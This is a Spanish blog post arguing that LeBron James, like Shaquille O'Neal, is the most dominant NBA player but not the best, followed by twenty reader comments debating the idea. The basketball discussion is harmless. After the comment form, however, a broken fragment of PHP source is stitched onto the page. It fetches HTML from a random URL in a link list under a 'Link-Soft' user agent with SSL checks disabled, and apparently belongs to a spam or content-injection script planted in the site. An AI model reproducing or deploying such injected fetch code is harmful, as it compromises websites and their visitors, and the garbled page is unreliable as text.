Más dominante vs mejor jugador

19 de June de 2012 por Esteban

LeBron James me recuerda a Shaquille O’Neal.

Desde el 2000 hasta el 2003 Shaq dominó la NBA como pocos, con números inmesos y títulos por doquier. Todos coincidían en que era el jugador más dominante de la NBA  pero no el mejor jugador.

Creo que a LeBron le pasa lo mismo. Es, sin duda, el más dominador. Sus numeros lo apañan pero dudo que alguien lo considere el mejor basquetbolista del mundo.

El básquet es más que dominio, es más que Shaq machacando una y otra vez, reboteando y taponando, y que LeBron defendiendo y penetrando con la fuerza de un toro. El básquet es belleza, elegancia, plasticidad, etc. y hoy eso lo encarnan jugadores como Kobe Bryant, Kevin Durant o hasta Dwyane Wade.

Bill Russell fue mucho más dominante que Michael Jordan, ganó más anillos, pero nadie duda que Jordan fue el mejor. ¿Por qué?

Porque el básquet es belleza, elegancia, plasticidad…

Comenta

20 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Me esperaba bastante más del artículo la verdad. Me ha decepcionado bastante… lo siento Esteban. El título y saber que tú lo publicabas me hacía esperar algo mucho más argumentado y extenso, pero me encuentro con esto… en fin, es solo mi opinión. Saludos

      Citar

  2. GreenPride dice:
    #2

    Tal como está expuesto, es más jugador más dominante contra jugador que más nos apetece ver.
    A mi modo de ver LeBron es por ejemplo a día de hoy más dominante y mejor jugador que Durant por ejemplo pero si tengo que sentarme a ver a uno de los dos prefiero ver a Durant.
    El caso es que el más dominante suele ser el mejor jugador pero no necesariamente el más elegante y el que más nos guste observar. Como dices Shaq fue el más dominante y yo creo que también el mejor jugador en esa época que dices. ¿Por qué? Pues porque el mejor jugador es el que domina más apartados del juego a gran nivel (como LeBron que anota, rebotea, defiende, roba, etc) y además sirve para ganar partidos. Otra cosa es que luego uno diga que su estilo es más digamos “bruto” como lo era el de Shaq y ahora lo es LeBron.
    Por ejemplo a mí el jugador que más me ha gustado ver en una cancha era Larry Bird, por su inteligencia, por cómo usaba sus recursos, por cómo pasaba, anotaba o reboteaba según se necesitara y por su determinación en el clutch. Ahora bien si tengo que decir quién es mejor jugador y más dominante que para mí es casi lo mismo digo Michael Jordan porque tenía un instinto asesino bestial.
    Por poner un ejemplo claro, me sentaría gustoso a ver a Olajuwon pero considero más decisivo al Shaq de sus mejores años y por tanto mejor jugador.

      Citar

  3. TheDeerHunter dice:
    #3

    ¿a quién se consideraba en su día mejor jugador que Shaq?

    Es que bueno… Shaq, además de ser una bestia era un pasador esquisito, el juego de pies te puedes cagar…

    El problema de LeBron es un problema de carisma más que cualquier otra consideración. Es muy físico, pero tanto talento como cualquiera. El hecho de que la mayoría quiera ver en Durant mejor jugador que LeBron simplemente por pura animadversión no significa que sea así. Si el dominio del segundo sobre el primero se termina confirmando para mí ya no quedará ninguna duda de que LeBron es el mejor jugador del planeta ahora mismo desde cualquier punto de vista.

    Ah… y el basket es belleza, elegancia, plasticidad pero también es fuerza, velocidad, dureza, intensidad… Un punto de vista no puede secuestrar todo el deporte

      Citar

  4. txusma dice:
    #4

    Sancho88:
    Me esperaba bastante más del artículo la verdad. Me ha decepcionado bastante… lo siento Esteban. El título y saber que tú lo publicabas me hacía esperar algo mucho más argumentado y extenso, pero me encuentro con esto… en fin, es solo mi opinión. Saludos

    Hombre, no todos los días tenemos que publicar un artículo de 3000 palabras. Esteban solo quería dar pie al debate para rellenar estos días que nos quedamos sin final.

      Citar

  5. TheDeerHunter dice:
    #5

    @Sancho: El blog no son solo artículos. Bien lo deberías saber tú, crack

      Citar

  6. TheDeerHunter dice:
    #6

    Otro comentario al artículo.
    No conoco a nadie que defienda que Bill Russell fue más dominante que Jordan por tener más títulos. Russell fue la pieza exacta que le hacía falta a una máquina imparable de baloncesto, pero individualmente no fue ni siquiera el mayor dominador de su época. Fue el MVP que no entraba en el equipo ideal, por ejemplo.

    Si hablamos del sesgo que nos presentas opino que Jordan tampoco ha sido el más excelso, elegante, técnico… Mucho de su juego se basaba en un físico increíble, en agresividad y dureza. Pero a otros se les reprocha esto mismo. Es algo que ni entiendo ni comparto.

      Citar

  7. Sancho88 dice:
    #7

    Ok, pero tengo derecho a expresar lo que me ha parecido el artículo verdad? Y digo más, un artículo de opinión se le presupone más empaque, esto ha sido como comenzar una historia que podía tener muy buen final y dejarla a medias. De Esteban me esperaba más, casi da la sensación de aparecer el artículo con formato La Pregunta en vez de artículo personal.

      Citar

  8. GreenPride dice:
    #8

    Estoy de acuerdo en que esto es deporte y que el físico es una parte muy importante de él. Es como cuando en tenis llegan y dicen, “Es que Nadal gana porque físicamente es mejor”. Bueno, ¿Y qué? ¿Es que eso no cuenta? Eso también se entrena y luego hay que saber aprovechar ese físico tal como hace LeBron y hacía Shaq porque estamos hartos de ver jugadores con gran físico que no saben sacarle ningún partido o no todo el que podrían, un ejemplo podría ser Josh Smith, muy buen jugador pero que podría ser increíble si tuviera mejora cabeza y mejorara un par de cosas.
    En definitiva el basket como cualquier otro deporte es físico y técnica y la mejor combinación de ambos es la que gana y la que hace a un jugador más dominante y decisivo.

      Citar

  9. simon dice:
    #9

    pues yo me voy a posicionar en favor de esteban sancho, a mi personalmente me gustan y mucho estos articulos que sirven de mera introduccion a un debate mas extenso que nos entretenga en estos dias que no hay nada mas que comentar sobre la final de la nba, si el objetivo de Esteban hubiera sido sentar cátedra sobre este tema pues si que pienso que podría haber profundizado mas pero no creo que su objetivo fuera ese.

      Citar

  10. simon dice:
    #10

    Por cierto pienso que si nos acotamos a la época 2000-2003 pienso que Shaq era el ultramegahiper mas dominante y el mejor de la liga. Luego comento mas que ahora no estoy en casa.

      Citar

  11. Lanegan dice:
    #11

    Me parece un debate muy interesante, el concepto “el mejor” siempre es muy complicado de definir. Para mi si se puede diferenciar un jugador que domina los conceptos y fundamentos del deporte frente a otro más limitado pero mucho más dominante. Olajuwon o Sabonis eran pivots con fundamentos y técnica superiores a Chamberlain u O’neal, pero estos fueron más dominantes. Quién es mejor? Pues depende, si se trata de ganar un partido de baloncesto me quedo con el O’neal de principios de siglo, si se trata de disfrutar viendo todo la gama de movimientos de un pivot me quedo con Olajuwon.

      Citar

  12. Lanegan dice:
    #12

    ¿Quién es mejor jugador de baloncesto, el que hace más probable la victoria de su equipo o el que tiene un mayor dominio de los fundamentos del deporte?

      Citar

  13. Esteban dice:
    #13

    Sancho88:
    Me esperaba bastante más del artículo la verdad. Me ha decepcionado bastante… lo siento Esteban. El título y saber que tú lo publicabas me hacía esperar algo mucho más argumentado y extenso, pero me encuentro con esto… en fin, es solo mi opinión. Saludos

    jeje sancho! tienes razon, era un comentarioq ue se me ocurrio para otra entrada y lo mande asi, no fue muy extenso pero espero poder extenderme a la hora de comentar!

      Citar

  14. Esteban dice:
    #14

    un ejemplo, cuando kobe gana su quinto anillo, el anunciador dice, recibira el trofeo EL MEJOR JUGADOR DEL MUNDO, y creo que en esas palabras habia justicia

    shaquille, mas alla de su dominio, era pesimo lanzando libres, y esteticamente no era hakem, por lo que cxonsiderarlo el mejor jugador del mundo no estaba en la agenda de nadie

    o sino por que, desde el retiro de jordan, se le ha estado buscando sucesor y se dice que no se le ha encontrado? tanto duncan como shaq dominaron la NBA despues de jordan, pero nunca se los considero su sucesor, en cambio si fueron considerados iverson, carter, kobe, wade y hasta james antes de debutar en la liga

    Lebron como eh dicho es el dominador de la nba, es imparable y esta haciendo uno PO de ensueño, pero tiene una fea mecanica de tiro, no tiene un tiro de tres confiable, su porcentaje en libres no es de lo mejor, y tiene problemas para cerrar los juegos, todos aspectos que no lo hacen peor jugador, pero hacen que no termine de cerrar como el mejor

    shaq era algo similar, dominaba a sus rivales de manera apabullante, pero su forma de lanzar libres daba hasta gracia, no podia anotar un tiro fuera de la zona pintada y apenas botaba el balon, era el mas dominante si, pero el mejor? aun en el apogeo de shaq se siguio buscando al nuevo jordan, y creo que aun en el apogeo de james se seguira buscando a un nuevo jordan, esto es, un jugador elegante, capaz de hacer piruetas en el aire y no solo romper el aro, con movimientos plasticos, carisma, etc

      Citar

  15. GreenPride dice:
    #15

    Esteban, respecto a lo que dices creo que con Shaq y Duncan se siguió buscando al nuevo Jordan porque eran jugadores interiores, no porque no dominaran la liga. Es cierto que Shaq tenía alguna carencia como los tiros libres, no tanto así el bote que creo que lo dominaba más que bien para ser un pivot y tenía un gancho y un tiro a la media vuelta más que aceptables. Con ello no sólo dominaba sino que apabullaba a la mayoría de sus rivales en aquellas 3 temporadas, era sin duda el mejor jugador del mundo en aquellos momentos. Ahora bien, creo que tú estás yendo más por el derrotero de una palabra que creo que ya se ha nombrado aquí, el carisma.
    Es cierto que los jugadores más elegantes y con una actitud más humilde tienen más carisma y conectan mejor con la gente y acaban siendo recordados como los mejores, obviamente siendo muy buenos jugando.
    Yo desde luego tengo a Shaq o a LeBron como dos jugadores dominantes, uno dominó completamente su tiempo, el otro lo está intentando con unos números de ensueño pero hasta que no gane campeonatos no lo conseguirá.
    Y no hay que buscar al nuevo Jordan porque no lo habrá. Disfrutemos de lo que tenemos con jugadorazos como Durant o LeBron que van a marcar su época de la historia como antes lo hicieran los Mikan, Russell, Chamberlain, Robertson, Kareem, Magic, Bird, Jordan o Shaq por decir algunos.

      Citar

  16. Sancho88 dice:
    #16

    A eso me refería Esteban, que la entrada tenía más pinta de comentario, pero si sirve para introducir un debate, entonces way, de eso se trata. Solamente mi crítica era constructiva, teniendo en cuenta tus conocimientos sobre NBA porque lo has demostrado este curso, que es cuando yo más he entrado a la página, pues se me quedaba corto como entrada, e incluso al ver el título y el nombre de la publicación he estado a punto de irme a por una birra para sentarme a leer algo maravilloso (que pienso que puede salir de esta idea, un artículo realmente bueno y extenso, no para sentar cátedra, ojo, no nos equivoquemos, sino para ilustrar hazañas personales, grandes partidos, estadísticas, etc.).

    Yo personalmente, me esperaba algo parecido a esto (y ojo, no soy yo quien para decir nada de esperar artículos porque soy el primero que me declaro como analfabeto de la NBA al lado de todos vosotros, eso que vaya por delante)

    http://blog.tjnba.com/2012/03/28/%C2%BFquien-fue-lafayette-fat-lever/

    Del cual puedo decir que junto a la serie completa de los partidos históricos, son los artículos que más me han flipado de la página.

    No sé, Shaquille contra Lebron, nunca me lo había planteado. Fuerza bruta dominante… no son comparables para mí porque eran jugadores muy diferentes, obviamente. Mientras Lebron domina todos los apartados del juego y los ejecuta con brillantez y eficacia (que no con belleza estética), Shaquille para mí fue el Ronaldo Nazario del baloncesto. Es decir, uno esperaba una colgada a una mano sin saltar, dándole con el puto brazo en la cabeza de su defensor y riéndose de él por demostrar esa superioridad tan sumamente aplastante. Uno esperaba que humillara al contrario, tb su mate a dos manos flexionando rodillas y haciendo temblar todo el pabellón. Shaquille O’Neal fue un jugador muy coordinado, a pesar de sus últimos años. Era capaz de coger mandarinas en el aire como Howard o Griffin, pero a veces también bailaba con los pies a pesar de su aspecto de rudo, su gancho a una mano a la media vuelta era totalmente demoledor, y si mal no recuerdo lo podía ejecutar con ambas manos, lo cual tiene muchísimo mérito para un tipo como él, tan descomunalmente grande. No sé, O’Neal fue simplemente algo especial, y yo quizá lo recuerdo como lo más dominante e indefendible que vi jamás, pero tampoco se puede decir que fuera peor jugador. Ok, no tenía mucha inteligencia con el pase (paradojas del destino, si mal no recuerdo se la dio a Horry para eliminarnos a los Kings en 2001), y con el tiro libre daba pena, sobre todo cuando decía al comienzo de las temporadas que había practicado el tiro libre y que ese año lanzaría por encima del 70%, y luego era mentira y todos sabíamos que volvería la campaña de la mandarina una vez más…

    Pero yo me quedo con vídeos como estos.

    http://www.youtube.com/watch?v=ewBnHq04CRg

    Aquí se ve lo que podía hacer Shaquille… Al César lo que es del César

      Citar

  17. Esteban dice:
    #17

    sancho no me he enojado, entiendo la critica, ya te digo, ayer hablaban de lebron y se me ocurrio comentar eso, pero me di cuenta que por la hora ya muchos no entrarian al blog, y faltando temas por haber pocos partidos me parecio interesante postearlo directamente

    debe ser mi percepcion sobre james, debe ser que no me gusta verlo jugar, debe ser que cuando hace una gran jugada de su repertorio digo QUE BESTIA y no QUE JUGADOR!!

    entiendo que meree su anillo, que ha marcado historia, pero no me cierra su juego, por mas dominador que sea, lo mismo me pasaba con shaquille, QUE ANIMAL DIOS! pero nunca QUE JUGADOR

    a eso me referia, a mis ojos, por mas dominantes que sean ambos, al no ser esteticos no terminan de cerrarme

      Citar

  18. Sancho88 dice:
    #18

    Hombre, en ese aspecto me parece que por aquí hay más fans de Kobe Bryant por lo estético (imposible no quedarse encantado con sus jugadas), que de Shaquille o Lebron. Si lo estrapolamos a la vida, no deja de ser algo comparable al ideal de belleza que salió de la antigua Grecia. Creo que todos nos idenfificamos con aquello que es estéticamente agradable, vistoso de ver, y damos más importancia a un gesto lindo que a un gesto de brutalidad sin ningún matiz artístico. El basket es arte, amigo mío, y por eso Magic, Jordan o Bryant pasarán a la historia de una manera, y Lebron, Shaquille o Griffin lo harán de otra manera, porque el basket es arte, pero no es solamente arte, como bien dice Deer.

    Yo, como soy un poco alternativo, me voy al juego de pies de Akeem y a la habilidad de pase de Webber. No encuentro estéticamente en el mundo de la canasta nada en comparación a ellos que me haga correrme de gusto. Y es curioso lo de Akeem, ya que todavía hoy, si mal no recuerdo Rondo contra los Heat, todos intentan hacer su reverso cerca del aro engañando con la pelota y con los pies. Definitivamente marcó época.

    Y reitero que el debate que has abierto me parece interesante por comparar dos estilos baloncestísticos, y que esto da para mucho. Si conoces a Gonzalo Vázquez, él se la pasa todo el rato hablando de eso en su blog, PuntoG. Ahí disecciona el juego de los más grandes. Particularmente, te recomiendo esto

    http://blogs.acb.com/blog/elpuntog/post/sudan-los-canones-gotas-de-plomo

    Pero tiene artículos de mucho nivel sobre NBA. Si tienes tiempo y no lo conocías, te recomiendo que te prepares unas palomitas, birra, un té, lo que desees, y si tienes una tarde tranquilita que no tengas que hacer nada… no seré yo quien te desaconseje que te pegues un atracón durante horas y horas de lo que ha escrito este señor. Símplemente ilustrador.

      Citar

  19. Roberto dice:
    #19

    Hace varios meses que te empece a leer y esta será la primera vez que comentaré porque este articulo merece un aplauso. Sin duda te encuentro toda la razon. Muy buen blog y muy bueno articulos, pero este es de lo mejor que te he leido. Una cosa nada mas, un jugador domintante no gana anillos solo, al igual que un jugador bueno. mj tenia a scottie, shaq tenia a kobe y lebron ahora tiene a wade y bosh.

      Citar

  20. Esteban dice:
    #20

    Roberto:
    Hace varios meses que te empece a leer y esta será la primera vez que comentaré porque este articulo merece un aplauso. Sin duda te encuentro toda la razon. Muy buen blog y muy bueno articulos, pero este es de lo mejor que te he leido. Una cosa nada mas, un jugador domintante no gana anillos solo, al igual que un jugador bueno. mj tenia a scottie, shaq tenia a kobe y lebron ahora tiene a wade y bosh.

    jajajajaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>